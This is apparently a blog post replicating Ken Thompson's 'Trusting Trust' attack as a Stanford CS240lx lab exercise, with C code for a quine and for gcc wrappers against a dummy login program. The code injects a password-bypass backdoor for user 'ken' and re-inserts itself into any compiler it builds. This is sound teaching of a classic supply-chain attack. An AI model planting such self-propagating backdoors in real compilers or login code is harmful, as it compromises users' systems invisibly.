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Thompson hack implementation based on the cs240lx trusting trust lab.

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Replicating the Thompson Hack

In Ken Thompson's famous paper Reflections on Trusting Trust, he introduced an attack that went undetected in the C compiler, which allowed the hacked compiler to compile compromised UNIX login commands. If you haven't read this paper yet, I strongly recommend that you take a look. In this post, we will replicate Thompson's attack on a dummy login program.

The wonderful part of the Thompson Hack is that it creates a rogue compiler that infects all its children. Even when the initial rogue compiler compiles clean source code of a compiler, the compiled compiler is still hacked, and will continue to generate hacked binaries. And these rogue compilers can go undetected, because their source code is clean. Ken Thompson quoted this attack to make the point that "No amount of source-level verification or scrutiny will protect you from using untrusted code."

The starter code was part of Stanford's CS240lx labs created by Dr. Dawson Engler. You can find the lab files here in the course repo. You can find my implementation of the Thompson Attack here.

Step 1: A Self-Replicating Program

The first step toward a Thompson Attack involves creating a quine, or a self-reproducing program. To be more specific, a quine is a program that when run prints out its own source code.

An example is shown in Fig 1 of the Trusting Trust paper. Our quine is actually a bit different from Thompson's example:

char s[] = {
    /* lines omitted */

/* Even with some comments. */

#include <stdio.h>

int main() {
    int i;

    printf("char s[] = {\n");
    for(i = 0; s[i]; i++)
        printf("\t%d,\n", s[i]);
    printf("%s", s);
    return 0;

We will look at how we can generate such a quine.

The quine consists of two parts: the char s[] definition and the main body. The contents of s[] is the second part of the program, starting from /* Even to the final }.

To create such a program, we start from the main body, defined in step1/seed.c:

/* Even with some comments. */

#include <stdio.h>

int main() {
    int i;

    printf("char s[] = {\n");
    for(i = 0; s[i]; i++)
        printf("\t%d,\n", s[i]);
    printf("%s", s);
    return 0;

Note that seed.c by itself is not legal code. The definition of s[] is missing, and we will write some code to generate it.

We write another program, step1/string-to-char-array.c, that takes input from stdin, and prints out a snippet of C code that defines a char[] named s, whose content is the same as the input.

// convert the contents of stdin to their ASCII values (e.g.,
// '\n' = 10) and spit out the <prog> array used in Figure 1 in
// Thompson's paper.
#include <stdio.h>

int main(void) {
    // put your code here.
    printf("char s[] = {\n");
    int c;
    while ((c = fgetc(stdin)) != EOF) {
        printf("\t%d,\n", c);
    return 0;

We can now generate the char[] representation for our seed.c. By combining these two snippets (the char[] representation of seed.c and seed.c itself), we can obtain a quine replicate.c:

# Compile string-to-char-array.c
gcc -Og -g -Wall string-to-char-array.c -o string-to-char-array

# Convert seed.c to its char[] definition
./string-to-char-array < seed.c > replicate.c

# Append seed.c itself. Now we have the quine replicate.c.
cat seed.c >> replicate.c

When replicate.c is run, it will first print out its own char s[] definition, and then print out the content of s, which is just the content of seed.c.

We can compile and run replicate.c and see if it really outputs itself:

# Compile replicate.c
gcc -Og -g -Wall replicate.c -o replicate

# Run replicate
./replicate > kid.c

# The output should be exactly replicate.c's source
diff replicate.c kid.c

kid.c and replicate.c should be identical.

Step 2 - Hacking the "Compiler"

The second step of Thompson's attack is hacking the compiler. In Thompson's paper, he actually modified an actual C compiler to inject code into the UNIX login program. In our replication, we will also target a specific program step2/login.c, but we will not be touching gcc itself. Instead, we will "hack" a wrapper of gcc.

The wrapper is defined in step2/identity-cc.c. The program simply makes a copy of the source code (input) and throws the copy to gcc without changing it. We will hack this "compiler" by making it change the source code while copying it.

Specifically, in step2/trojan-cc1.c, we will scan for the line int login(char *user) { in the source code, and inject this line below it to skip authentication if the username is ken:

    if (strcmp(user, "ken") == 0) return 1;

Simple enough. But besides simply doing this, we also want to hack the compiler, such that when we use the hacked compiler to compile a new compiler, the compiled new compiler will also be hacked. We will leave this part to step 3 as it's fairly complicated. In this step, we will simply add a printf statement when compiling a compiler, inside the compile function.

The compile function in step2/trojan-cc1.c looks like this:

static void compile(char *program, char *outname) {
    FILE *fp = fopen("./temp-out.c", "w");

    static char compile_sig[] =
            "static void compile(char *program, char *outname) {\n"
            "    FILE *fp = fopen(\"./temp-out.c\", \"w\");\n"
            "    assert(fp);"
    // inject this after the assert.  not much of an attack.   this is just a quick placeholder.
    static char compile_attack[] = "printf(\"%s:%d: could have run your attack here!!\\n\", __FUNCTION__, __LINE__);";

    static char login_sig[] = "int login(char *user) {";
    static char login_attack[] = "if(strcmp(user, \"ken\") == 0) return 1;";

    // detect the xxx_sig substrings,
    // insert the xxx_attack after it

    fprintf(fp, "%s", program);

    // gross, call gcc.
    char buf[1024];
    sprintf(buf, "gcc ./temp-out.c -o %s", outname);
    if(system(buf) != 0)
        error("system failed\n");

To insert the login_attack code, we simply do some ugly C string manipulation:

    char *login_sig_loc = strstr(program, login_sig);
    if (login_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t login_attack_offset = login_sig_loc - program + strlen(login_sig);
        strcpy(tmp, program + login_attack_offset);
        strcpy(program + login_attack_offset, login_attack);
        strcpy(program + login_attack_offset + strlen(login_attack), tmp);

After doing this, we can compile a hacked login program with our hacked compiler step2/trojan-cc1.c:

# First compile our hacked compiler using gcc
gcc -Og -g -Wall -Wno-unused-variable trojan-cc1.c -o trojan-cc1

# Compile login.c with our hacked trojan-cc1 compiler
./trojan-cc1 login.c -o login-attacked

# Run the attacked login program

Now we should be able to log in with the username ken, without needing to enter a password:

user: ken
successful login: <ken>

Naturally the compiler_attack is similar:

    char *compile_sig_loc = strstr(program, compile_sig);
    if (compile_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t compile_attack_offset = compile_sig_loc - program + strlen(compile_sig);
        strcpy(tmp, program + compile_attack_offset);
        strcpy(program + compile_attack_offset, compile_attack);
        strcpy(program + compile_attack_offset + strlen(compile_attack), tmp);

We can do the same thing to compile our identity compiler identity-cc.c with our trojan-cc1 compiler.

# Compile identity-cc.c with our hacked trojan-cc1 compiler
./trojan-cc1 identity-cc.c -o cc-attacked

# Use the attacked compiler program to compile login.c
./cc-attacked login.c -o login

We can see our printf message being printed:

compile:18: could have run your attack here!!

This is not very interesting. We want the login compiled with cc-attacked to also have the ability to inject code, but currently cc-attacked does nothing special other than printing out this message.

We will look at how to make cc-attacked do these more evil things in the next step.

Step 3 - Making the "Compiler" Self-Replicating

In step 3, we will develop a more powerful version of step2/trojan-cc1.c, named step3/trojan-cc2.c. As described in the previous step, we want to make the new compiler cc-attacked compiled with our trojan-cc2 compiler to also behave like trojan-cc2. In other words, we want trojan-cc2's children (and grandchildren, greatgrandchildren, etc.) to continue to generate hacked compilers and hacked login programs. This is tricky, and we will use our string-to-char-array technique from step 1.

To achieve this, we will need to insert our attack code from step 2 into the compiler that trojan-cc2 compiles. Instead of injecting a printf statement, we can inject the entire attack code! We place our attack code in step3/attack.c:

    // not a very robust finger-print, but what can you do.
    // in a real compiler we would do this match on the parse tree,
    // which strips out some non-essential features.
    static char compile_sig[] =
            "static void compile(char *program, char *outname) {\n"
            "    FILE *fp = fopen(\"./temp-out.c\", \"w\");\n"
            "    assert(fp);"

    static char login_sig[] = "int login(char *user) {";
    static char login_attack[] = "if(strcmp(user, \"ken\") == 0) return 1;";

    /* your code goes here */
    char *login_sig_loc = strstr(program, login_sig);
    if (login_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t login_attack_offset = login_sig_loc - program + strlen(login_sig);
        strcpy(tmp, program + login_attack_offset);
        strcpy(program + login_attack_offset, login_attack);
        strcpy(program + login_attack_offset + strlen(login_attack), tmp);

    char *compile_sig_loc = strstr(program, compile_sig);
    if (compile_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t compile_attack_offset = compile_sig_loc - program + strlen(compile_sig);
        strcpy(tmp, program + compile_attack_offset);
        strcpy(program + compile_attack_offset, compile_attack);
        strcpy(program + compile_attack_offset + strlen(compile_attack), tmp);

Note that we have removed the definition for compile_attack, since we will be injecting the entire attack code instead! To be able to inject our attack code, we modify our step1/string-to-char-array.c to become step3/generate-attack-array.c:

// convert the contents of stdin to their ASCII values (e.g.,
// '\n' = 10) and spit out the <prog> array used in Figure 1 in
// Thompson's paper.
#include <stdio.h>

int main(void) {
    // put your code here.
    printf("static char compile_attack[] = {\n");
    int c;
    while ((c = fgetc(stdin)) != EOF) {
        printf("\t%d,\n", c);
    return 0;

With this, we can convert our attack code into a char[] definition. Now we can simply #include it in our attack code:

// make #include appear on new line
#include "attack-array.h"
    // not a very robust finger-print, but what can you do.
    // in a real compiler we would do this match on the parse tree,
    // which strips out some non-essential features.
    static char compile_sig[] =
            "static void compile(char *program, char *outname) {\n"
            "    FILE *fp = fopen(\"./temp-out.c\", \"w\");\n"
            "    assert(fp);"

    static char login_sig[] = "int login(char *user) {";
    static char login_attack[] = "if(strcmp(user, \"ken\") == 0) return 1;";

    /* your code goes here */
    char *login_sig_loc = strstr(program, login_sig);
    if (login_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t login_attack_offset = login_sig_loc - program + strlen(login_sig);
        strcpy(tmp, program + login_attack_offset);
        strcpy(program + login_attack_offset, login_attack);
        strcpy(program + login_attack_offset + strlen(login_attack), tmp);

    char *compile_sig_loc = strstr(program, compile_sig);
    if (compile_sig_loc != NULL) {
        static char tmp[8*1024*1024 + 1];
        size_t compile_attack_offset = compile_sig_loc - program + strlen(compile_sig);
        strcpy(tmp, program + compile_attack_offset);
        strcpy(program + compile_attack_offset, compile_attack);
        strcpy(program + compile_attack_offset + strlen(compile_attack), tmp);

With the new #include macro added, we need to run generate-attack-array again to update our compile_attack definition. Now in our trojan-cc2.c, we can simply include our attack code using #include "attack.c":

static void compile(char *program, char *outname) {
    FILE *fp = fopen("./temp-out.c", "w");

#include "attack.c"

    fprintf(fp, "%s", program);

    // gross, call gcc.
    char buf[1024];
    sprintf(buf, "gcc ./temp-out.c -o %s", outname);
    if(system(buf) != 0)
        error("system failed\n");

Now what will happen when we compile a clean compiler step2/identity-cc.c is, trojan-cc2 will inject our attack code defined in compile_attack right after the assert. Thus the attack code ends up in the new compiler, and the new compiler is again compromised. The new compiler, still containing the (compiled) attack code, will continue to infect compilers that it compiles.

And now we are done! To verify that it works, we can run the following:

# Compile trojan-cc2.c
gcc -Og -g -Wall -Wno-unused-variable trojan-cc2.c -o trojan-cc2

# Use trojan-cc2 to compile the clean compiler
./trojan-cc2 ../step2/identity-cc.c -o cc-attacked

# Use cc-attacked to compile the clean compiler
./cc-attacked ../step2/identity-cc.c -o cc-attacked2

# Compare the binaries -- it's ok if they don't match,
# as long as the next step works!
diff cc-attacked cc-attacked2

# Compile the login program with cc-attacked2
./cc-attacked2 ../step2/login.c -o login-attacked

# Run the login program

And when we enter ken as the username, we log in successfully!

user: ken
successful login: <ken>

What have we achieved? Now we have a compiler binary that even when given clean virgin compiler source code, will still produce hacked binaries. As long as people use prebuilt binaries to build next-version compilers, the hack will remain forever in the system compiler, undetected.